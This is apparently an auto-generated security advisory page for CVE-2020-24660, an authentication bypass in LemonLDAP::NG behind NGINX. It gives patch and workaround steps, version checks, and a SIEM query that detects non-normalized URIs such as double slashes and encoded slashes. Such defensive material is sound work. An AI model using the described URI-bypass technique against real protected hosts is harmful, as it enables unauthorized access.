CVE-2020-24660 – This vulnerability allows attackers to bypass U... (How to Fix)

Q: What is the severity of CVE-2020-24660?

CVE-2020-24660 has a CVSS score of 9.8 (CRITICAL). This vulnerability allows attackers to bypass URL-based access controls in LemonLDAP::NG when used with NGINX by submitting non-normalized URIs. It affects LemonLDAP::NG through version 2.0.8 and the Node.js handler package before version 0.5.2. Attackers can potentially access protected virtual hosts without proper authentication.

📋 TL;DR

This vulnerability allows attackers to bypass URL-based access controls in LemonLDAP::NG when used with NGINX by submitting non-normalized URIs. It affects LemonLDAP::NG through version 2.0.8 and the Node.js handler package before version 0.5.2. Attackers can potentially access protected virtual hosts without proper authentication.

💻 Affected Systems

Products:

LemonLDAP::NG
Lemonldap::NG handler for Node.js

Versions: LemonLDAP::NG through 2.0.8; Node.js handler before 0.5.2

Operating Systems: All platforms running affected software

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects deployments using NGINX as the web server. Other web servers may not be vulnerable.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete bypass of authentication and authorization controls, allowing unauthorized access to sensitive applications and data behind the LemonLDAP::NG protection.

🟠

Likely Case

Unauthorized access to protected applications and resources that should require authentication.

🟢

If Mitigated

Limited impact with proper network segmentation and additional authentication layers, though access control bypass remains possible.

🌐 Internet-Facing: HIGH - Internet-facing applications protected by vulnerable LemonLDAP::NG instances are directly exposed to exploitation attempts.

🏢 Internal Only: MEDIUM - Internal systems are still at risk from internal attackers or compromised accounts, though attack surface is reduced.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires sending specially crafted non-normalized URIs to bypass URL matching logic. No authentication required.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: LemonLDAP::NG 2.0.9+; Node.js handler 0.5.2+

Vendor Advisory: https://github.com/LemonLDAPNG/node-lemonldap-ng-handler/security/advisories/GHSA-x44x-r84w-8v67

Restart Required: Yes

Instructions:

1. Update LemonLDAP::NG to version 2.0.9 or later. 2. Update Node.js handler to version 0.5.2 or later. 3. Restart NGINX and any affected services. 4. Verify the fix by testing access control functionality.

🔧 Temporary Workarounds

URI Normalization Enforcement

linux

Configure NGINX to normalize URIs before passing them to LemonLDAP::NG

Add 'merge_slashes on;' to NGINX configuration
Implement custom URI normalization in NGINX location blocks

🧯 If You Can't Patch

Implement additional authentication layer (e.g., IP whitelisting, client certificate authentication) for protected resources
Deploy WAF rules to detect and block non-normalized URI patterns targeting protected endpoints

🔍 How to Verify

Check if Vulnerable:

Check LemonLDAP::NG version: 'llng-manager --version' or check package version. For Node.js handler: check package.json version.

Check Version:

For LemonLDAP::NG: 'dpkg -l | grep lemonldap-ng' or 'rpm -qa | grep lemonldap-ng'. For Node.js: 'npm list lemonldap-ng-handler'

Verify Fix Applied:

Test access to protected resources using non-normalized URIs (e.g., double slashes, encoded characters) - should be properly blocked after fix.

📡 Detection & Monitoring

Log Indicators:

Unusual access patterns to protected resources
Failed authentication attempts followed by successful access
Requests with non-standard URI patterns (double slashes, encoded characters)

Network Indicators:

HTTP requests with abnormal URI structures to protected endpoints
Traffic bypassing expected authentication flows

SIEM Query:

source="nginx" AND (uri="*//*" OR uri="*%2f*" OR uri="*%5c*") AND response_code=200

📊 Metadata

CVE ID: CVE-2020-24660

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-425

Published: September 14, 2020

Last Updated: November 21, 2024

🔗 References

https://github.com/LemonLDAPNG/node-lemonldap-ng-handler/releases/tag/0.5.2 Third Party Advisory
https://github.com/LemonLDAPNG/node-lemonldap-ng-handler/security/advisories/GHSA-x44x-r84w-8v67 Third Party Advisory
https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2290 Exploit,Third Party Advisory
https://www.debian.org/security/2020/dsa-4762 Third Party Advisory
https://github.com/LemonLDAPNG/node-lemonldap-ng-handler/releases/tag/0.5.2 Third Party Advisory
https://github.com/LemonLDAPNG/node-lemonldap-ng-handler/security/advisories/GHSA-x44x-r84w-8v67 Third Party Advisory
https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2290 Exploit,Third Party Advisory
https://www.debian.org/security/2020/dsa-4762 Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2020-24660, you might also want to check these: